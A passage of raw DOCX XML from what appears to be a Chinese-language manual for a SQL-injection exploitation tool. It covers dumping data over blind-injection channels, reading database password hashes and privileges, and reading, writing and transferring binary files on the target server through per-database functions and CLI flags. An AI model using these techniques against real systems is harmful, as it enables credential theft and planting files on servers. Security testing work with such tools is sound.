        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>获取数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：选中表 / 列后 dump 行数据，支持：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ADB60C">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>分片读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（LIMIT 分页，大表不卡死）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E66068E">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>断点续传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（中断后从上次行号继续）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A68EB30">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>中文识别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（hex / 编码自动处理，避免乱码）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4BABD6">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>行数范围（start / stop）与 WHERE 条件过滤；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B5E59E">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>结果导出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5DE430">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>盲注通道下枚举同样可用，配合多线程 + 智能预测（n-gram 字符预测、值缓存）显著提速；树节点随命中实时增量更新。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F90CA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.4 Hash 读取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A38D30">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">读取数据库账户口令散列（如 MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>mysql.user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">、SQLServer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sys.sql_logins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">、Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sys.user$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>），按数据库类型自动选择语句与通道。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6316DACE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.5 权限角色</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAD2584">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举当前用户及全部用户的权限 / 角色（如 MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>information_schema.user_privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">、SQLServer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sys.server_principals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">、Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dba_roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2842C4CC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.6 文件操作（读取 / 写入 / 二进制传输）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B4DD6">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>文件操作页集成了读取文件、写文件与二进制上传/下载三类能力，按数据库类型自动选择文件读取通道，输入远程路径即可读取内容。操作方式通过下拉框选择通道，结果显示支持从首行展示、复制与导出。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2436"/>
        <w:gridCol w:w="7309"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="62446390">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="0E0B01BE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>读文件通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p w14:paraId="73CC72A8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
          </w:tcPr>
          <w:p w14:paraId="4B117374">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>load_file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0B9BD706">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQLServer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3FAAEA1E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FileSystemObject（OLE Automation）、BULK INSERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p w14:paraId="3C7A62A8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
          </w:tcPr>
          <w:p w14:paraId="0DAC2472">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY FROM（堆叠）、大对象 lo_import（Union/报错单语句）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3F428020">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>openGauss / Kingbase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="14D1228C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY FROM（兼容 PG 语法）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p w14:paraId="1292F3AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
          </w:tcPr>
          <w:p w14:paraId="4C193B4A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSVREAD（char 链免引号）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5421AA5E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ClickHouse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2E797DDC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>file()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 表函数（仅 user_files 目录）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p w14:paraId="334F5A32">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7308"/>
          </w:tcPr>
          <w:p w14:paraId="07DF5586">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GETXML + Java 存储过程（免堆叠，限 9i~11g：DBMS_XMLQUERY 可执行匿名 PL/SQL；12c 未验证，18c 弃用/21c+ 移除；XE 全版本无 JVM 不可用）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4098BFC4">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC17944">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.7 二进制文件上传 / 下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52269712">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>操作方式下拉框中选择「二进制下载 / 二进制上传」通道，字节级无损（全程 hex 传输，本地不过文本编码）。GUI：上传先点「选择文件」装载本地文件，下载完成后点「保存到本地」落盘；CLI：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--file-read=远端 --file-method=二进制下载 --file-dest=本地路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--file-write=本地 --file-dest=远端 --file-method=二进制上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1332"/>
        <w:gridCol w:w="4206"/>
        <w:gridCol w:w="4207"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1332"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="6ACBF44A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4205"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="5B921C8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>二进制下载</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4206"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="2EC0930E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>二进制上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1332"/>
          </w:tcPr>
          <w:p w14:paraId="3BF59CDE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4205"/>
          </w:tcPr>
          <w:p w14:paraId="031DCCF0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>hex(load_file())</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，全注入通道可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4206"/>
          </w:tcPr>
          <w:p w14:paraId="15644D50">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Union 小文件单发 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0x.. INTO DUMPFILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">（≤4KB）；堆叠临时表分片 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ORDER BY id INTO DUMPFILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 按序拼接；写后 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>length(load_file())</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1332"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="560431C0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4205"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="21C7FEC2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>lo_import</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>encode(data,'hex')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 分页（Union/报错/堆叠）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4206"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="24D38868">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">堆叠分页写 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>pg_largeobject</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>lo_export</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">；小文件 Union/报错 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>lo_from_bytea</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 单发；导出前字节数校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1332"/>
          </w:tcPr>
          <w:p w14:paraId="784026CA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQLServer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4205"/>
          </w:tcPr>
          <w:p w14:paraId="51F3EE1E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OPENROWSET(BULK..SINGLE_BLOB)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
